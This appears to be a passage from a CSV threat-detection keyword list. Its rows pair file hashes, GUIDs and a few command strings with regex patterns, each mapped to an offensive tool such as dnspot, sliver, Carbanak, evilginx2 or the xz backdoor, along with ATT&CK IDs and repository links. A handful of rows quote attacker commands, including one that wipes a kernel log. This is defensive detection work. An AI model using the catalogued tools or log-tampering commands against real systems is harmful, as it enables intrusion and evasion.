"*ec212e0be2629efd3fe6c0d1085d4d42f1245a30ff2dbe97fe708cdbdd55879c*",".{0,1000}ec212e0be2629efd3fe6c0d1085d4d42f1245a30ff2dbe97fe708cdbdd55879c.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42613"
"*EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052*",".{0,1000}EC235B9DDBCA83FD5BE2B80E2D543B07BE7E1052.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","42614"
"*ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c*",".{0,1000}ec260817672bcc48f734f89e9eac84ebc7903924b36f807caf58c6820c0e336c.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","#filehash","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","42615"
"*ec2a250f026c030d36c1f1d021816176a7a9a8f62f56673b418bca9154c5a3f1*",".{0,1000}ec2a250f026c030d36c1f1d021816176a7a9a8f62f56673b418bca9154c5a3f1.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","#filehash","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","42616"
"*ec2aaff0-b349-4855-9093-96acf6ee3299*",".{0,1000}ec2aaff0\-b349\-4855\-9093\-96acf6ee3299.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#GUIDProject","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","42617"
"*ec2b6024e73498b915399094e92d9976dfb2f1fbe07e476d67f36edbfb9b8532*",".{0,1000}ec2b6024e73498b915399094e92d9976dfb2f1fbe07e476d67f36edbfb9b8532.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","42618"
"*ec31a1b9d3b5672137349a35719e2f595394a90f3978d60ef5ffe7900763ac00*",".{0,1000}ec31a1b9d3b5672137349a35719e2f595394a90f3978d60ef5ffe7900763ac00.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42620"
"*ec359f50ca15395f273899c0ff7c0cd87ab5c2e23fdcfc6c72fedc0097161d4b*",".{0,1000}ec359f50ca15395f273899c0ff7c0cd87ab5c2e23fdcfc6c72fedc0097161d4b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42621"
"*ec37a2d841bd68da48bf8743a40bd25049ce081bfff67802900163b4b8f8f84c*",".{0,1000}ec37a2d841bd68da48bf8743a40bd25049ce081bfff67802900163b4b8f8f84c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42622"
"*ec38d2205220614ff7a5d76311a5661851da7442734adf67df1890ff80fa7e51*",".{0,1000}ec38d2205220614ff7a5d76311a5661851da7442734adf67df1890ff80fa7e51.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","42623"
"*ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c*",".{0,1000}ec3fea4e00eb0a4712a869b52eacce7efbcdcc9b958b8f46066e6f8969c4f79c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42625"
"*ec465f60755310dd0a79b20e355caf67c0c5f049e1ae8e9b9d1503fe198ef7bb*",".{0,1000}ec465f60755310dd0a79b20e355caf67c0c5f049e1ae8e9b9d1503fe198ef7bb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42627"
"*EC49A1B1-4DAA-47B1-90D1-787D44C641C0*",".{0,1000}EC49A1B1\-4DAA\-47B1\-90D1\-787D44C641C0.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#GUIDproject","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","42628"
"*EC54E?F8D79BF30B63C5249AF7A8A3C652595B923*",".{0,1000}EC54E\?F8D79BF30B63C5249AF7A8A3C652595B923.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","42629"
"*ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d*",".{0,1000}ec57e5c4d592d1ad0a0e79b22e85f8173bcb3c03f4497957f90def4175ca383d.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER - Black Basta","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","42630"
"*ec5eb13c414c6ab275ccf7b1b142bee66a5002846c6eea22e2c722705cd7cfb4*",".{0,1000}ec5eb13c414c6ab275ccf7b1b142bee66a5002846c6eea22e2c722705cd7cfb4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42632"
"*ec61e1fbfdc25380e23baadc18f997d45e27904d16008942de78dc55541a8e0f*",".{0,1000}ec61e1fbfdc25380e23baadc18f997d45e27904d16008942de78dc55541a8e0f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42634"
"*EC62CE1D-ADD7-419A-84A9-D6A04E866197*",".{0,1000}EC62CE1D\-ADD7\-419A\-84A9\-D6A04E866197.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","42635"
"*ec64054f2ecdaea42d302fe63e1cbb9835998e492ac017d0ea7f2c24bc4c11c2*",".{0,1000}ec64054f2ecdaea42d302fe63e1cbb9835998e492ac017d0ea7f2c24bc4c11c2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42636"
"*ec68a6bf7f104a815bd21e27e73a8dfb8afcb282d4997bebe9eccd6c89259506*",".{0,1000}ec68a6bf7f104a815bd21e27e73a8dfb8afcb282d4997bebe9eccd6c89259506.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","42637"
"*ec6e3c3f97578eeeb27f891b19c4504e038e0488293eb1f3c50d3bdc2f30b017*",".{0,1000}ec6e3c3f97578eeeb27f891b19c4504e038e0488293eb1f3c50d3bdc2f30b017.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42638"
"*ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c*",".{0,1000}ec6f110ed955c4659147b008e4e1053b15a873b5bb887662b0685f84d929c44c.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","42639"
"*ec75e03dbec89909be98b833209c2a422ba68f24b0e45818d55b29174d5588b9*",".{0,1000}ec75e03dbec89909be98b833209c2a422ba68f24b0e45818d55b29174d5588b9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","42641"
"*ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726*",".{0,1000}ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42643"
"*ec7b353c3fe0edb57fb5bb38daa0b17b006e2a1eb9df64f3364b12bc63e7414f*",".{0,1000}ec7b353c3fe0edb57fb5bb38daa0b17b006e2a1eb9df64f3364b12bc63e7414f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42644"
"*ec9204b818a8bf3893428eb9c869e8aa2d53eaac52d9cb249ede288dbf042fea*",".{0,1000}ec9204b818a8bf3893428eb9c869e8aa2d53eaac52d9cb249ede288dbf042fea.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","42647"
"*ec945b53d3005194ef0710397f7179e57f7249012ce85ab47ee6b1519bc48d31*",".{0,1000}ec945b53d3005194ef0710397f7179e57f7249012ce85ab47ee6b1519bc48d31.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42648"
"*eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b*",".{0,1000}eca140e2de5725eeaa29ab48f86e1745ef0232aaafd04298eccb742e1241171b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42649"
"*eca3042259ae46f23a3a5484d10d6a12fe40abf58ff167af0e7efcf3c2b9c0b5*",".{0,1000}eca3042259ae46f23a3a5484d10d6a12fe40abf58ff167af0e7efcf3c2b9c0b5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42651"
"*eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f*",".{0,1000}eca525adef0c1dae7233b25f241c19cddbe8683cbbadd7c69915f7b3c37fb21f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42652"
"*ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9*",".{0,1000}ecb8ca794b3659f7ecf353e6ae879a6e405bae62ebaeb69cc12d596915d0e0d9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42655"
"*eccde00640f1c9f27b63f1a778eee3c50f401f62fbc0e8725a769b8bfe869e70*",".{0,1000}eccde00640f1c9f27b63f1a778eee3c50f401f62fbc0e8725a769b8bfe869e70.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42658"
"*ece36280c87bd6fdfd68a6e5daa3381aef5e79d9738db350f4dff8e55cc5090b*",".{0,1000}ece36280c87bd6fdfd68a6e5daa3381aef5e79d9738db350f4dff8e55cc5090b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","42660"
"*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","https://www.virustotal.com/gui/file/ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae","10","10","N/A","N/A","N/A","N/A","42662"
"*ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae*",".{0,1000}ece869c6e359a650da3a82c8d26239bde4293a591c0d634815595129654665ae.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#filehash","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A","42663"
"*ecebdd54145e9987d9ae0f389369e33571bbbad53970f990423902bdb2cc59d2*",".{0,1000}ecebdd54145e9987d9ae0f389369e33571bbbad53970f990423902bdb2cc59d2.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","42666"
"*ecec28a01376200b8746d6e2a9873d19b5191cdeb07ae926974b94d775b0c4cf*",".{0,1000}ecec28a01376200b8746d6e2a9873d19b5191cdeb07ae926974b94d775b0c4cf.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","42667"
"*ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363*",".{0,1000}ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","42668"
"*ecee4a34d7e86b3445b1ccadefe2e5587808cbd1a1f1408fe63ac3c2aad84d2f*",".{0,1000}ecee4a34d7e86b3445b1ccadefe2e5587808cbd1a1f1408fe63ac3c2aad84d2f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42669"
"*ecf242b41a845439cc80e76710718b3162be13aee4c7abfa153a5e913c0f4767*",".{0,1000}ecf242b41a845439cc80e76710718b3162be13aee4c7abfa153a5e913c0f4767.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","42671"
"*ecf31fb8345ea09312964922c549238664485b5593e9e79fb823a3b996c1c5f2*",".{0,1000}ecf31fb8345ea09312964922c549238664485b5593e9e79fb823a3b996c1c5f2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42672"
"*ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5*",".{0,1000}ecf32e9cc006fb558375569ad4021fe588206e04722fe0474a34d05d9cc358f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42673"
"*ecf3679f659c5a1393b4a8b7d7cca615c33c21ab525952f8417c2a828697116a*",".{0,1000}ecf3679f659c5a1393b4a8b7d7cca615c33c21ab525952f8417c2a828697116a.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","42674"
"*ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b*",".{0,1000}ecfb9ac1dd1fec043188b3c66c6fbc54c824c9de99e964abfc08836e9877701b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","42677"
"*ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3*",".{0,1000}ecfd0cd8274471f448e0ca1f0ee3d94affb9508c6c3cf8c72ade2e0fdd1b85b3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42678"
"*echo ""@RFGroenewoud""*",".{0,1000}echo\s\""\@RFGroenewoud\"".{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","42686"
"*echo ""Nothing to see here ... "" > /var/log/kern.log*",".{0,1000}echo\s\""Nothing\sto\ssee\shere\s\.\.\.\s\""\s\>\s\/var\/log\/kern\.log.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","42687"
"*echo %cmdcmdline% | find /i ""%~f0"">nul || exit /b 1*",".{0,1000}echo\s\%cmdcmdline\%\s\|\sfind\s\/i\s\""\%\~f0\""\>nul\s\|\|\sexit\s\/b\s1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","#linux","SomalifuscatorV2 used on batch file","10","","N/A","","","","42688"
